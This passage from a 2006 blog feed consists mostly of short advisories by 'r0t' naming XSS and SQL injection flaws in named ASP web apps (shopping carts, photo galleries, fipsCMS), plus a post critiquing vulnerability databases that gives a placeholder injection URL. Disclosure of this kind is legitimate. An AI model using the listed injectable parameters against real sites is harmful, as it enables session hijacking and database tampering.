/&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115020245677883686?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115020245677883686/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115020245677883686' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115020245677883686'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115020245677883686'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/evgenius-counter-xss-vuln.html' title='EvGenius Counter XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114989499311486646</id><published>2006-06-10T01:16:00.000+02:00</published><updated>2007-03-27T21:43:21.690+02:00</updated><title type='text'>DwZone Shopping Cart XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 10 june 2006&lt;br /&gt;vendor:http://www.dwzone.it/Extension/ShoppingCart/default.asp&lt;br /&gt;affected versions:1.1.9 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;DwZone Shopping Cart contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "ToCategory" and "FromCategory" parameter in "ProductDetailsForm.asp" and input passed to the "UserName" and "Password" parameter in "LogIn/VerifyUserLog.asp" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114989499311486646?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114989499311486646/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114989499311486646' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114989499311486646'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114989499311486646'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/dwzone-shopping-cart-xss-vuln.html' title='DwZone Shopping Cart XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114989419408589275</id><published>2006-06-10T01:01:00.000+02:00</published><updated>2007-02-25T06:01:07.660+01:00</updated><title type='text'>Xtreme ASP Photo Gallery XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 10 june 2006&lt;br /&gt;vendor:http://pensacolawebdesigns.com/xtremeasp/default.asp&lt;br /&gt;affected versions:1.05 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;Xtreme ASP Photo Gallery contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "catname" and "total" parameter in "displaypic.asp" and input passed to the "catname" parameter in "displaythumbs.asp" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114989419408589275?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114989419408589275/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114989419408589275' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114989419408589275'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114989419408589275'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/xtreme-asp-photo-gallery-xss-vuln.html' title='Xtreme ASP Photo Gallery XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114989308602497791</id><published>2006-06-10T00:44:00.000+02:00</published><updated>2006-06-10T00:44:46.306+02:00</updated><title type='text'>Uphotogallery XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 10 june 2006&lt;br /&gt;vendor:www.uapplication.com/uphotogallery/index.asp&lt;br /&gt;affected versions:1.1 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;Uphotogallery contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "s" and "Block" parameter in "thumbnails.asp" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114989308602497791?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114989308602497791/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114989308602497791' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114989308602497791'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114989308602497791'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/uphotogallery-xss-vuln.html' title='Uphotogallery XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114988737320784161</id><published>2006-06-09T23:08:00.000+02:00</published><updated>2006-06-09T23:09:33.390+02:00</updated><title type='text'>ePhotos vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 9 june 2006&lt;br /&gt;vendor:http://enthrallweb.com/detail.asp?ProductID=13&lt;br /&gt;affected versions:2.2 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;ePhotos contains a flaw that allows a remote sql injection attacks.Input passed to the "CAT_ID" parameter in "subphotos.asp",subLevel2.asp and Input passed to the "AL_ID" parameter in "photo.asp" and Input passed to the "SUB_ID" parameter in "subLevel2.asp" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114988737320784161?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114988737320784161/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114988737320784161' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114988737320784161'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114988737320784161'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/ephotos-vuln.html' title='ePhotos vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114988654947905104</id><published>2006-06-09T22:54:00.000+02:00</published><updated>2006-06-09T22:55:49.583+02:00</updated><title type='text'>i-Gallery XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 9 june 2006&lt;br /&gt;vendor:http://www.b-cp.com/igallery/&lt;br /&gt;affected versions:i-Gallery 4.1 PLUS and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;i-Gallery contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "n" and "d" parameter in "login.asp" and input passed to the "d" parameter in "igallery.asp" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114988654947905104?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114988654947905104/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114988654947905104' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114988654947905104'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114988654947905104'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/i-gallery-xss-vuln.html' title='i-Gallery XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114988549292374784</id><published>2006-06-09T21:34:00.000+02:00</published><updated>2006-06-15T23:00:14.326+02:00</updated><title type='text'>bugtraqs @ all</title><content type='html'>Hi guys , as in last 6mothes i had reported about some bugs in webaplications, i think that i can tell something about bugtraqs at all. &lt;br /&gt;Some critic of course.. &lt;br /&gt;&lt;br /&gt;Lets start with secunia.com &lt;br /&gt;Security research company wich is orginally located in Denmark , those guys do alot of job , they do alot in they personal research..they try to verifyall reported vulns, ok sometimes they verification isnt so sucefull as some attacker exploitation of bug, but dont forget that they try to verify all , so thats point bring them to best form all. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;As next one i wanna view osvdb.org&lt;br /&gt;Open source vuln. database - thats says something. Great guys they verify all stuff , thats why they come out later than others. &lt;br /&gt;They was my favorites , but in my eyes thy lose favorite place , when they started to use words "Exploit is Rumored" by examples. &lt;br /&gt;In that point if i give example like http://victim/vuln_app/index.php?cat=[XSS]&lt;br /&gt;Thats one isnt a exploit , did  i any time published as exploit? &lt;br /&gt;Its example for those who like or must to verify.&lt;br /&gt;So, thats why it "was" my favorite. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;So one of most popular for years is securityfocus.com&lt;br /&gt;&lt;br /&gt;They are good enough, i never send them one of my reports.. oh..yes once it was as bugtraq for some site apliction , yahoo or other one. &lt;br /&gt;I was laughing , when i saw credits like discovered by "rakstija r0t3d3vil" ... "rakstija"- is latvian word - wrote . &lt;br /&gt;In start of my repport is always wroten wich guy had discovered that, but thats only mean that guys ned better glases as i have. &lt;br /&gt;Why i didnt report to them? &lt;br /&gt;Simple answer - where to report?&lt;br /&gt;If i cant find with 2 clicks i dont have any interess more to report them. &lt;br /&gt;&lt;br /&gt;Next one will  be frsirt.com&lt;br /&gt;&lt;br /&gt;Nice guys , but they dont verify by them selfs , but wait for secunia guys. &lt;br /&gt;I think thats tell everything. &lt;br /&gt;&lt;br /&gt;next one is security.nnov.ru&lt;br /&gt;&lt;br /&gt;Nice russian guys, they are more buglist as bugtraq , cauz they dont verify anything . &lt;br /&gt;But good point of them , they are fastest updated "bugtraq" on earth. &lt;br /&gt;&lt;br /&gt;and nvd.nist.gov&lt;br /&gt;&lt;br /&gt;National vulnerability database, thats says nothin..but domain wich ends with ".gov" say alone something. They risk rate isnt better as by SANS.I dont think that they have alot of reports from guys who discover vulns. , but they are good  with collecting them even they are from .gov&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;and ofcourse xforce.iss.net&lt;br /&gt;&lt;br /&gt;I will say its black horse in that chalange. &lt;br /&gt;I never send them report of my work , but they are always know everything. &lt;br /&gt;Maybe they are located as outhsider in by da best ones, but they do good job. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;yes and milw0rm.com&lt;br /&gt;&lt;br /&gt;str0ke do a good job at all, site is specific cauz mostly is based on exploits and reports are mostly only with exploits, thats not bad at all. &lt;br /&gt;&lt;br /&gt;yes and the popular russian source securitylab.ru &lt;br /&gt;&lt;br /&gt;They dont verify and remove links to orinal advisory , thats point why i dont like to report to them .. But thats  not only them , mostly all russian security resources remove advisory authors and orginaly sources... but in thats i n best way , sometimes they like to give credits to them selfs.. So the worth security or bugtraq scene in world is russian. &lt;br /&gt;Other one russian wich i know is hackzona.ru, they only translate random advisories from secunia and thats all , and there isnt point like "when" or "who"... who cares?&lt;br /&gt;other one is xakep.ru - they have own sucessful jurnal and other things for n00bs. &lt;br /&gt;most of butraq'ed things they published as own. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;secwatch.org ....&lt;br /&gt;&lt;br /&gt;They collect infos from bigest bugtraqs and have they own bugtraq list wich isnt also verified. &lt;br /&gt;&lt;br /&gt;netsecurity.com&lt;br /&gt;&lt;br /&gt;copy/paste - thats say evrything. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hackerscenter.com&lt;br /&gt;&lt;br /&gt;Not a bugtraq, but portal wich have bugtraq , of course they dont verify , but its more better than russian of point cauz they dont forget about that guys wich discovered that stuff wich they published. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;So i think i had wrote about most popular bugtraqs , if i missed some , than sorry ...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114988549292374784?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114988549292374784/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114988549292374784' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114988549292374784'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114988549292374784'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/bugtraqs-all.html' title='bugtraqs @ all'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114987863338702789</id><published>2006-06-09T20:42:00.000+02:00</published><updated>2006-06-12T22:51:22.560+02:00</updated><title type='text'>ClickGallery vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 9 june 2006&lt;br /&gt;vendor:&lt;a href="http://www.clicktech.com/products.asp?id=82&amp;Cat=Software&amp;SubCat=ClickGallery&amp;SubCatID=46"&gt;ClickTech&lt;/a&gt;&lt;br /&gt;affected versions:5.0 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ClickGallery contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "gallery_id" parameter in "gallery.asp" and input passed to the "parentcurrentpage" parameter in "view_gallery.asp" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114987863338702789?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114987863338702789/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114987863338702789' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114987863338702789'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114987863338702789'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/clickgallery-vuln.html' title='ClickGallery vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114986761454232635</id><published>2006-06-09T17:38:00.000+02:00</published><updated>2006-06-09T17:40:28.473+02:00</updated><title type='text'>fipsCMS &lt;=v4.5 XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 9 june 2006&lt;br /&gt;vendor:&lt;a href="http://www.fipsasp.com/home/index.asp?lg=1&amp;w=pages&amp;r=81&amp;pid=51"&gt;fipsASP&lt;/a&gt;&lt;br /&gt;affected versions:v4.5 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;fipsCMS contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to multiple parameters "w","phcat","dayid","calw" in "index.asp" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114986761454232635?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114986761454232635/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114986761454232635' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114986761454232635'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114986761454232635'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/fipscms-v45-xss-vuln.html' title='fipsCMS &lt;=v4.5 XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114986644467189858</id><published>2006-06-09T17:19:00.000+02:00</published><updated>2006-06-09T17:20:44.840+02:00</updated><title type='text'>fipsGallery vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 9 june 2006&lt;br /&gt;vendor:&lt;a href="http://www.fipsasp.com/home/index.asp?lg=1&amp;w=pages&amp;r=81&amp;pid=140"&gt;fipsASP&lt;/a&gt;&lt;br /&gt;affected versions:v1.5 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;fipsGallery contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "path" parameter in "zoom.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114986644467189858?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114986644467189858/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114986644467189858' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114986644467189858'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114986644467189858'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/fipsgallery-vuln.html' title='fipsGallery vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114986466735862516</id><published>2006-06-09T16:49:00.000+02:00</published><updated>2006-06-09T16:51:07.706+02:00</updated><title type='text'>Clickcart 6.0 XSS</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 9 june 2006&lt;br /&gt;vendor:&lt;a href="http://www.clicktech.com/products.asp?id=82&amp;Cat=Software&amp;SubCat=ClickCart&amp;SubCatID=11"&gt;ClickTech&lt;/a&gt;&lt;br /&gt;affected versions:6.0 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;Clickcart contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "cat" parameter in "default.asp" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114986466735862516?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114986466735862516/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114986466735862516' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114986466735862516'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114986466735862516'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/clickcart-60-xss.html' title='Clickcart 6.0 XSS'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114986323183489128</id><published>2006-06-09T16:25:00.000+02:00</published><updated>2006-06-09T16:27:12.103+02:00</updated><title type='text'>WS-Album XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 9 june 2006&lt;br /&gt;vendor:&lt;a href="http://www.planeteafrique.com/__Ateliers/Index.asp?affiche=Applications/WS-Album_US.asp"&gt;PlaneteAfrique&lt;/a&gt;&lt;br /&gt;affected versions:1.1 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;WS-Album contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "image" and "PublisedDate" parameter in "FullPhoto.asp" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114986323183489128?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114986323183489128/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114986323183489128' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114986323183489128'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114986323183489128'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/ws-album-xss-vuln.html' title='WS-Album XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114986221283749035</id><published>2006-06-09T16:09:00.000+02:00</published><updated>2006-06-09T16:10:13.096+02:00</updated><title type='text'>EZGallery &lt;= v1.5 XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 9 june 2006&lt;br /&gt;vendor:www.htmljunction.net/ezgallery/&lt;br /&gt;affected versions:v1.5 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;EZGallery contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the multiple parameters (pUserID,aid,aname,uid,m) in "common/galleries.asp" and Input passed to the multiple parameters (aid,aname,uid,m,gp,g) in "common/pupload.asp" and Input passed to the "msg","fn","gp" parameters in "common/upload.asp" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114986221283749035?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114986221283749035/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114986221283749035' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114986221283749035'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114986221283749035'/><link rel='alternate' type='text/html' 